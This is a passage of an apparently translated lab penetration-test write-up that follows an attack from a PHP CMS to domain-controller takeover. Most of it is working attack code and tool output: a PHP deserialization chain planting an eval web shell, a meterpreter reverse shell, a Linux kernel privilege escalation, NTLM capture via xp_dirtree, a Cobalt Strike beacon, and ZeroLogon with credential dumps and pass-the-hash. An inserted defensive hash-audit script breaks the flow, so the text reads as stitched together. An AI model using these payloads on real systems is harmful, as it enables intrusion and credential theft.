function get_cookie($name, $key = '') {
    $key = 'P4tzizR6d';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}

function set_cookie($args, $key = '') {
    $key = 'P4tzizR6d';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}

$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b, '');
echo str_replace('+', '%2B', $a);

The file was read successfully.

The MySQL account is root with password 9a973fd7928bb3c2, and the database is www_xycms_com. Next, modify the exploit.

Add a user to the admin table:

 "where" => "id=0;insert into www_xycms_com.xyh_admin (id,username,password,encrypt,user_type,is_lock,login_num) VALUES (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"

Logged into the backend.

3.5 xyhcms getshell

<?php
namespace Think\Db\Driver;
use PDO;

class Mysql {
    protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);
    protected $config = array(
        "dsn"      => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306",
        "username" => "root",
        "password" => "9a973fd7928bb3c2"
    );
}

namespace Think;

class Model {
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct() {
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
            "table" => "xyh_admin_log",
            "where" => "id=0; alter table xyh_guestbook add column `<script language='php'>eval(\$_POST[cmd]);</script>` varchar(10);",
        );
    }
}

namespace Think\Session\Driver;

class Memcache {
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}

namespace Think\Image\Driver;

class Imagick {
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}

namespace Common\Lib;

class SysCrypt {
    private $crypt_key;

    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }

    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }

    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this->crypt_key = null;
    }
}

function get_cookie($name, $key = '') {
    $key = 'P4tzizR6d';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}

function set_cookie($args, $key = '') {
    $key = 'P4tzizR6d';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}

$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b, '');
echo str_replace('+', '%2B', $a);

Clear the cache in the backend, visit http://192.168.0.160//index.php?s=/Guestbook/index.html to regenerate it, then open:

http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/www_xycms_com.xyh_guestbook.php

Finally in.

4. Linux privilege escalation

4.1 Bypassing Baota's command-execution block

BT blocks command execution; it can be bypassed through a plugin. The tmp directory contains this socket: /tmp/php-cgi-56.sock

Commands can now be executed.

4.2 Privilege escalation on the Baota host

First get a reverse shell, here using msf:

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.168 lport=12345  -f elf -o shell
chmod +x shell
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 12345
lport => 12345
msf6 exploit(multi/handler) > set lhost 192.168.0.168
lhost => 192.168.0.168
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.168:12345
[*] Sending stage (3020772 bytes) to 192.168.0.160
[*] Meterpreter session 1 opened (192.168.0.168:12345 -> 192.168.0.160:59870 ) at 2022-05-07 08:55:03 -0400
meterpreter >

Upgrade the shell: python3 -c 'import pty;pty.spawn("/bin/bash")'

/www/server/panel/data/default.db is Baota's database file; it stores Baota's configuration, including the account, password and other sensitive information, but the current privileges cannot read it.

4.3 CVE-2021-3493 privilege escalation on Ubuntu 18.04

In the end this CVE's exploit escalated successfully to root. Download: https://github.com/briskets/CVE-2021-3493

gcc -o exploit exploit.c
chmod +x exploit

4.4 Cracking /etc/shadow with hashcat

root:x:0:0:root:/root:/bin/bash
web1:x:1000:1000:web1,,,:/home/web1:/bin/bash
db:x:1003:1003:,,,:/home/db:/bin/bash
web1:$6$gqtH0Rj2$lxbeVfR7GZMvClPiLmvoOWB6DKjYb0kJe2hVY3IxE6v5qG/C.NhZsBYTPWNkAGxvj7.ETMbwUrssClfI31JG1.:19118:0:99999:7:::
db:$6$Min6QwNX$tpa7Je0y5YhyswU9qtFI7Rh7KN3nI3bNIl.1WKTzhXuSlVvUTetUrpk27Jj8rIQzoPG3GWKLIA78pcW8ZSMfR/:19118:0:99999:7:::
hashcat -m 1800 -a 0 -o found.txt hash.txt rockyou.txt

One user's password was cracked:

$6$Min6QwNX$tpa7Je0y5YhyswU9qtFI7Rh7KN3nI3bNIl.1WKTzhXuSlVvUTetUrpk27Jj8rIQzoPG3GWKLIA78pcW8ZSMfR/:db123456

5. Internal network penetration

5.1 Information gathering on the target

According to the topology provided, scan the designated IP 192.168.0.165:

└─$ nmap -sV -A 192.168.0.165 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 12:32 EDT
Nmap scan report for 192.168.0.165
Host is up (0.00052s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2012 11.00.3128.00; SP1+
| ms-sql-ntlm-info: 
|   Target_Name: SCANER
|   NetBIOS_Domain_Name: SCANER
|   NetBIOS_Computer_Name: DB
|   DNS_Domain_Name: scaner.sec
|   DNS_Computer_Name: db.scaner.sec
|   DNS_Tree_Name: scaner.sec
|_  Product_Version: 6.3.9600
|_ssl-date: 2022-05-07T16:34:22+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-05-05T15:49:41
|_Not valid after:  2052-05-05T15:49:41
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info: 
|   192.168.0.165:1433: 
|     Version: 
|       name: Microsoft SQL Server 2012 SP1+
|       number: 11.00.3128.00
|       Product: Microsoft SQL Server 2012
|       Service pack level: SP1
|       Post-SP patches applied: true
|_    TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.43 seconds

Only port 1433 is open, and the host appears to be domain-joined: db.scaner.sec.

hydra -L user.txt -P top1000.txt 192.168.0.165 mssql -vV -f -o ok.txt

The top-1000 list failed, and the known password db123456 failed as well. When both fail, consider whether MSSQL is using domain-user (Windows) authentication.

5.2 Logging into MSSQL as a domain user

─$ python3 mssqlclient.py scaner/db:db123456@192.168.0.161 -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DB): Line 1: 已将数据库上下文更改为 'master'。
[*] INFO(DB): Line 1: 已将语言设置更改为 简体中文。
[*] ACK: Result: 1 - Microsoft SQL Server (110 1256) 
[!] Press help for extra shell commands
SQL> 

Login succeeded. Running enable_xp_cmdshell shows the user's privileges are low:

SQL> enable_xp_cmdshell
[-] ERROR(DB): Line 105: 用户没有执行此操作的权限。
[-] ERROR(DB): Line 1: 您没有运行 RECONFIGURE 语句的权限。
[-] ERROR(DB): Line 62: 配置选项 'xp_cmdshell' 不存在,也可能是高级选项。
[-] ERROR(DB): Line 1: 您没有运行 RECONFIGURE 语句的权限。
SQL> 

5.3 Capturing NTLMv1 hashes with Responder

Run Responder on the chosen interface to capture; be sure to add -v, otherwise it only captures once.

sudo responder -I eth0 -v    

Run this on SQL Server; the goal is to make it connect out to Kali:

 exec xp_dirtree '\\192.168.0.168\test',0,1;

Kali now has the hash. The type is NTLMv1.

DB$::SCANER:4088726E576881AF00000000000000000000000000000000:CA91B65F4CDFD004E2A91146B3B805CDDDD05FBD30BD4F18:aea11808f69bdb1e 

5.5 Cracking the NTLMv1 hash

hashcat -m 5500 DB$::SCANER:4088726E576881AF00000000000000000000000000000000:CA91B65F4CDFD004E2A91146B3B805CDDDD05FBD30BD4F18:aea11808f69bdb1e top1000.txt -o found.txt --force

The password is freepass.

Use mssqlclient with this password to enter the MSSQL service:

└─$ python3 mssqlclient.py sa@192.168.0.161 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DB): Line 1: 已将数据库上下文更改为 'master'。
[*] INFO(DB): Line 1: 已将语言设置更改为 简体中文。
[*] ACK: Result: 1 - Microsoft SQL Server (110 1256) 
[!] Press help for extra shell commands
SQL> 

Commands now execute, but the context is still nt service\mssqlserver, which has fairly low privileges, so escalation is needed.

5.6 Cobalt Strike beacon check-in

xp_cmdshell powershell -nop -w hidden -encodedcommand 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

Use MS16-075 to escalate to SYSTEM.

Dump credentials:

* Username : DB$
* Domain   : SCANER
* NTLM     : 936a440598db1c326ad86ba68d73370d
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e7d7b11f5b4352988cddcd12daa1510:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

6. Internal domain penetration

6.1 Finding the domain controller

[*] Tasked beacon to import: D:\pentest\cs\CS插件\.\powershell\PowerView.ps1
[*] Tasked beacon to run: Get-NetDomainController (unmanaged)
[+] host called home, sent: 236001 bytes
[+] received output:
Forest                     : scaner.sec
CurrentTime                : 2022/5/8 1:19:37
HighestCommittedUsn        : 13392
OSVersion                  : Windows Server 2012 R2 Standard
Roles                      : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain                     : scaner.sec
IPAddress                  : 10.10.10.135
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback : 
InboundConnections         : {}
OutboundConnections        : {}
Name                       : ad.scaner.sec
Partitions                 : {DC=scaner,DC=sec, CN=Configuration,DC=scaner,DC=sec, CN=Schema,CN=Configuration,DC=scaner,DC=sec, DC=DomainDnsZones,DC=scaner,DC=sec...}

6.2 Start a proxy to reach the domain controller

beacon> socks 1088
[+] started SOCKS4a server on: 1088
[+] host called home, sent: 16 bytes
sudo vi /etc/proxychains4.conf
proxychains4 nmap 10.10.10.135 -p 88 -sT -Pn                                              
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 22:20 EDT
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:88  ...  OK
Nmap scan report for 10.10.10.135
Host is up (0.011s latency).
PORT   STATE SERVICE
88/tcp open  kerberos-sec

6.3 ZeroLogon (CVE-2020-1472): escalating to the domain controller

CVE-2020-1472 is, after MS17-010, one of the more convenient intranet privilege-escalation vulnerabilities. It affects multiple versions from Windows Server 2008 R2 through Windows Server 2019, and it can be exploited as long as the attacker can reach the target domain controller and knows its computer name. It does not require the current machine to be domain-joined, nor to run Windows. The stable exploitation path is to reset the target DC's machine-account password, use the DC's credential to perform DCSync to obtain domain-admin credentials, and then restore the DC's password. The DC credential is not used to run commands remotely because the DC machine account cannot log on interactively; it does, however, hold DCSync rights and can therefore retrieve any domain user's credential.

During exploitation the DC's credential stored in the domain database (ntds.dit) is reset. When that stored credential no longer matches the one held locally in the registry/LSASS, the DC falls out of the domain, so the DC credential must be restored as soon as possible after the reset.

└─$ proxychains4 python cve-2020-1472-exploit.py ad 10.10.10.135
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:49158  ...  OK
=====================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
proxychains4 python3 secretsdump.py scaner/ad\$@10.10.10.135 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:49155  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.sec\db:1106:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
scaner.sec\moonsec:1109:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12SERVER-DB$:1107:aad3b435b51404eeaad3b435b51404ee:3ebf8c0281893b7661e0897d434fd900:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460
krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20df
krbtgt:des-cbc-md5:91f2ab6198c1adf2
scaner.sec\db:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5
scaner.sec\db:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251
scaner.sec\db:des-cbc-md5:f2cd2c3bceae0dcd
scaner.sec\moonsec:aes256-cts-hmac-sha1-96:39054a2b86cb867177d23678dd40f2cfe89eaaa69f4a5e36725585cc0ad2faac
scaner.sec\moonsec:aes128-cts-hmac-sha1-96:fee3562d30d7a5556e87962382c828c6
scaner.sec\moonsec:des-cbc-md5:f1160b49cd8654e5
AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930
AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948
AD$:des-cbc-md5:e6fd2cae86c479fb
12SERVER-DB$:aes256-cts-hmac-sha1-96:2caf760f94b8b8c25d33ae599748f5f9e8a9b7770dd79cde858276b4c22cb423
12SERVER-DB$:aes128-cts-hmac-sha1-96:43aa58ec20e5067c32f81d7827e0d786
12SERVER-DB$:des-cbc-md5:97cb313b2931c7c7
[*] Cleaning up... 
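The dump above is exactly the artefact an incident responder would review after a suspected ZeroLogon: the exploit sets the DC machine account's password to the empty string, so the AD$ line carries the empty-password NT hash. The following is an added example (not from the original post) that parses the domain\uid:rid:lmhash:nthash format and flags that condition. The function names and the sample dump are my own; only the two empty-password hash constants are real.

```python
import re
from dataclasses import dataclass

# Hashes of the empty password: LM part (always this once LM storage is off)
# and NT part (MD4 of the empty UTF-16 string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Line shape produced by secretsdump: domain\uid:rid:lmhash:nthash:::
DUMP_RE = re.compile(
    r"^(?P<name>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::\s*$")

# Constructed sample mirroring the dump above; the non-empty hashes are made up.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
scaner.sec\\db:1106:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
"""


@dataclass
class DumpEntry:
    name: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self) -> bool:
        return self.name.endswith("$")   # computer accounts end with '$'


def parse_dump(text: str) -> list:
    """Keep only credential lines; progress lines and Kerberos keys are skipped."""
    return [DumpEntry(m["name"], int(m["rid"]), m["lm"], m["nt"])
            for m in map(DUMP_RE.match, text.splitlines()) if m]


def findings(entries: list) -> list:
    """What a responder looks for after a suspected ZeroLogon or a weak-policy audit."""
    out = []
    for e in entries:
        if e.is_machine and e.nt == EMPTY_NT:
            # Exactly what the exploit leaves behind: the DC's machine-account
            # password reset to "" (compare the AD$ line in the dump above).
            out.append(f"{e.name}: machine account has an empty password; restore the "
                       "original secret and review Netlogon event IDs 5827-5829 on the DC")
        elif e.nt == EMPTY_NT and e.name != "Guest":   # Guest is disabled by default
            out.append(f"{e.name}: user account has an empty password")
        if e.lm != EMPTY_LM:
            out.append(f"{e.name}: LM hash still stored; enable NoLMHash and rotate")
    return out
```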

6.3 Log in to the domain controller

proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb Administrator@10.10.10.135


6.4 Set up CS forwarding


6.5 Obtain a session on the domain controller

Remember to turn off the firewall

netsh advfirewall set allprofiles state off  # turn off the firewall
netsh advfirewall show allprofiles           # show firewall status
shell net use \\10.10.10.135\ipc$ "QWEasd000" /user:scaner\administrator
shell dir \\10.10.10.135\c$
jump psexec64 10.10.10.135 rve


6.6 Restore the domain controller's password

Export the files

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del system.save
del sam.save
del security.save

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x3598ef959977a32edee6a7e37fa84031
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:3c6da21c49ad3ad0576f9ae27a373f29e4ba38394dbb9226a09399c45a82afbdf0a5fe04c97e564511800fc4f05c16c7d3c82cd37e9abbfd303d444bf98389a38e0dd0ee4f36d9ea8b11ee90c4a22da811eb35e036405ccf89913b95c353b2f90466c69a076afc338a6d2fe2cd8a185b9f656b92da5ee93bb098e82962f14d6813228a806e4a9fea4b3d5112a3ee799fe88f8767b03caf546cd59903b5a8d7e6ab3d6f3683024e74e3928df3cdf0791f3e58dc35c7a83344f020c22e2a42dd264d9a8f150d6d626955b8920e8559f90f9761ecf9d75976acb3762ab4468f3dac577ef1f52b89a6c8a13de18e21497c38
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:049d2188a55da0d1511d4391043c3a68
[*] DefaultPassword 
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38
dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5
[*] NL$KM 
0000   AA C3 E0 AC C2 DA 1C 8A  E2 DB 90 CA 31 0B 7E 7A   ............1.~z
0010   6F 59 D2 1E BE 59 7D 65  25 B2 88 77 DE 20 C5 B2   oY...Y}e%..w. ..
0020   92 A6 4D 30 2D 1F 40 7D  64 2D 47 3B 92 C4 04 9D   ..M0-.@}d-G;....
0030   EB DE 94 64 A6 7F 7F 5C  13 61 F4 C8 6E BA 0E B5   ...d...\.a..n...
NL$KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5
[*] Cleaning up... 
proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 049d2188a55da0d1511d4391043c3a68 
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\\i\x84|TW3O' 
NegotiateFlags:                  556793855 
AccountRid:                      1001 
ErrorCode:                       0 

server challenge b'\\\xb1\xbd\x1d,tPS'
session key b'?:\x1a\xd4\x1f\x91\xda\xfb\xa3G\xed\r\x1b\xd0\x03h'
NetrServerPasswordSetResponse 
ReturnAuthenticator:            
    Credential:                     
        Data:                            b'\x01C\x19\x91X\xca\x8d\x7f' 
    Timestamp:                       0 
ErrorCode:                       0 

Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.

Verify

proxychains4 python3 secretsdump.py scaner/ad\$@10.10.10.135 -no-pass

Thanks to Master Moon (月师傅) for the lab environment.

In everyone's heart there is someone they cannot forget, yet cannot hold and cherish.
